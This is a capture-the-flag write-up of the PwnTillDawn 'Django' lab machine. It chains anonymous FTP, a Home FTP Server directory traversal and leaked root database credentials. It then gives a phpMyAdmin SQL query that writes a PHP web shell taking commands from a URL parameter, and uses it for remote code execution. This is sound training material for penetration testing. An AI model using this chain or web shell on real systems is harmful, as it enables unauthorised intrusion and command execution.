---
title: Django Writeup PwnTillDawn
author: r0b0tG4nG
date: 2021-11-28 11:33:00 +0800
categories: [Blogging, PwnTillDawn]
tags: [writeups, exploit-db, ftp, phpmyadmin, php rce]
math: true
mermaid: true
---

(image)<br><br>

**> Information Gathering**<br>
In every engagement, one has to gather information first. As usual we run our nmap scan and from we can see that port 21 (ftp), 80 (http), 443 (ssl), 3306 (mysql) & 8089 (splunkd) are open.<br>
(nmap anonymous)<br>

FTP service running on the target has anonymous login enabled. So we log in with `anonymous` as a username and continued to gather more information.<br>
(ftp login)<br>

During the anonymous login, FTP printed the banner `220-Wellcome to Home Ftp Server!`. This banner does not look like the usual banner on FTP services. This is interesting to look at could be a different ftp sofware installed on the target.<br>
(ftp banner)<br>

A quick research on google shows that some version of `Home Ftp Server!` are vulnerable and tehre are some exploits out there.<b>
(google)<br>

We found an exploit on <a href="https://www.exploit-db.com/exploits/15349">Exploit-DB</a> which states that `Home FTP Server version 1.11.1.149` has `Directory Traversal` vulnerability. <br>
(exploitdb)<br>

To exploit this vulnerability, all we need to do is to apply `/..` to the path and we can retrieve files or navigate directories. <br>
(../image)<br>

Typing `cd /..` takes us to the root path as seen in teh screenshot above. Indeed this version is vulnerable to `Directory Traversal`. After a couple of minutes, i found a `passwords.txt` file in the `/../xampp` directory and quickly grabbed this file to my machine. <br>
(passwords.txt )<br>

Reading the contents of `passwords.txt` revealed credentials to `MySQL (phpMyAdmin)`. The credentials found was `root:thebarrierbetween`.<br>
(credentials)<br>

From nmap we know that this target has a webserver running on port 80. Browsing to port 80 we can see the default page of xampp webapp. This is no suprpise since we saw xampp from FTP session<br>
(web page)<br>

On the upper-right corner on the dashboard we can see `phpMyAdmin`. Clicking on it leads us to `phpMyAdmin` login page. <br>
(phpmmyadmin)<br>

We have the credentials already. I input the credentials `root:thebarrierbetween` on the login page.<br>
(login pphp)<br>

A successful login should lead you to the admin dashboard. Remember you logged in as `root` user so we have full control over the database. There is a 90% chance that we can use `SQL Query` to create  a `php backdoor`.<br>
(dashboard)<br>  

Click on `SQL`, and type the following query `SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php"` from ftp, we can confirm the path of `xampp` on the target. Click on `go` to create our backdoor.<br>
(sql creatte query)<br>

Log into `FTP` again, navigate to the `/../xampp/htdocs` directory to check if your file `backdoor.php` exists. If it exists, then we are 2 steps away from gaining `code execution` on the target.<br>
(ftp file)<br>

Navigate to http://10.150.150.212/backdoor.php?cmd=whoami and we have `code execution` on the target. You can replace `whoami` in the url with any windows commands. Good luck getting shell.<br>
(image rce)<br> 


Referrence: <a href="https://online.pwntilldawn.com/">PwnTillDawn Online battlefield</a>